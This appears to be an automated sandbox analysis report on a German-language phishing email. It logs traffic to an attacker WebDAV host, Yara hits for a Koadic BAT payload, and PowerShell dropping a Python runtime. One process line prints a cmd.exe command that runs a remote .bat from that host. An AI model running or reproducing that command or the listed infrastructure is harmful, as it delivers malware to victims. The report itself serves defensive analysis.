e7 22 9f 97 35 fc 00 fc af 62 f0 83 3f f9 5e 78 27 83 77 18 55 2a 62 55 c2 58 a5 45 57 f6 a5 85 c2 62 41 7d 7c d5 3e f5 5d ac be b3 17 c5 98 18 8a 1c 13 45 fa 25 50 f4 a3 37 a8 63 dd b3 3d ba 4e 6c 50 5b 69 b1 14 51 75 aa 05 a8 4e e3 f5 38 7c 9d 4d b0 08 74 bb 98 20 6c 15 da 66 0a ee 7d 6a 6d 86 15 b2 94 e9 ad c0 3e c1 5f 2a d6 3e 0e cc d5 bc 76 86 d6 a6 cd ce 70 06 84 1a 50 2f 94 f4 98 74 7d 0e dc 23 1d 80 59 69 d6 43 5d 62 41 47 a8 6b cd 3c 7d 12 62 00 78 bb 8f 2a 1e 6c d8 a6 4d 9b 2c ee 9a 3d cd e6 a3 b7 ce c0 0c 6b 28 2c 39 e7 ae 03 65 6d 11 56 4c 70 87 2b 54 28 0c 75 c9 1f 56 28 ab 33 6c 82 34 18 6a db 7c 7a ea c6 ec 99 02 d9 90 61 07 b0 c5 e5 ee fd f4 bd 62 68 0f 3a 41 3b 41 71 f4 ed 7f 9d cd 01 53 ab 2d a5 4f 7f 20 cb 4f
                Source: global trafficHTTP traffic detected: GET /new.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: burrkeklprinting.tech:4098
                Source: global trafficHTTP traffic detected: GET /DXJS.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: burrkeklprinting.tech:7119Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/style.css HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/script.js HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/logo.png HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/script.js HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/favicon.ico HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/logo.png HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /:dir_browser/favicon.ico HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /new.bat HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://burrkeklprinting.tech:4098/new.batAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /startuppp.bat HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /E_TAX_DOC/ HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /E_TAX_DOC/ HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /E_TAX_DOC/ HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /E_TAX_DOC/E_TAX_DOC438093562789873345672_pdf.lnk HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/E_TAX_DOC/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /FTSP.zip HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /FTSP.zip HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /kyvbsa.pdf HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://burrkeklprinting.tech:4098/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /kyvbsa.pdf HTTP/1.1Host: burrkeklprinting.tech:4098Connection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /new.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheIf-Modified-Since: Tue, 30 Jul 2024 13:12:55 GMTUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: burrkeklprinting.tech:4098
                Source: global trafficDNS traffic detected: DNS query: string-neural-inspiration-polo.trycloudflare.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: burrkeklprinting.tech
                Source: global trafficDNS traffic detected: DNS query: _4098._https.burrkeklprinting.tech
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 392Date: Tue, 30 Jul 2024 13:48:34 GMTServer: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 37 2d 33 30 20 30 36 3a 34 38 3a 33 34 2e 37 33 31 33 36 31 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /favicon.ico</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-07-30 06:48:34.731361</body></html>
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62242 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62246 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62271 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62252 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62255 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62239
                Source: unknownNetwork traffic detected: HTTP traffic on port 62278 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62249 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62278
                Source: unknownNetwork traffic detected: HTTP traffic on port 62243 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62247 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62250
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62251
                Source: unknownNetwork traffic detected: HTTP traffic on port 62251 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62249
                Source: unknownNetwork traffic detected: HTTP traffic on port 62254 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62258 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62241
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62242
                Source: unknownNetwork traffic detected: HTTP traffic on port 62248 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62243
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62244
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62245
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62246
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62247
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62248
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62244 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62250 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62273 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62253 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62252
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62253
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62254
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62255
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62256
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 62241 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62258
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62245 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62270 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62270
                Source: unknownNetwork traffic detected: HTTP traffic on port 62239 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62271
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62273
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62256 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.16:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:62239 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: dropped/chromecache_340, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyw.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\py.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\select.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pydJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pydJump to dropped file
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: dropped/chromecache_340, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                Source: classification engineClassification label: mal96.troj.spyw.expl.evad.winMSG@65/250@13/146
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:876:120:WilError_03
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240730T0947170725-7112.etl
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c \\burrkeklprinting.tech@4098\DavWWWRoot\new.bat
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
                Source: C:\Windows\System32\timeout.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERN Zahlungsbest#U00e4tigung.msg"
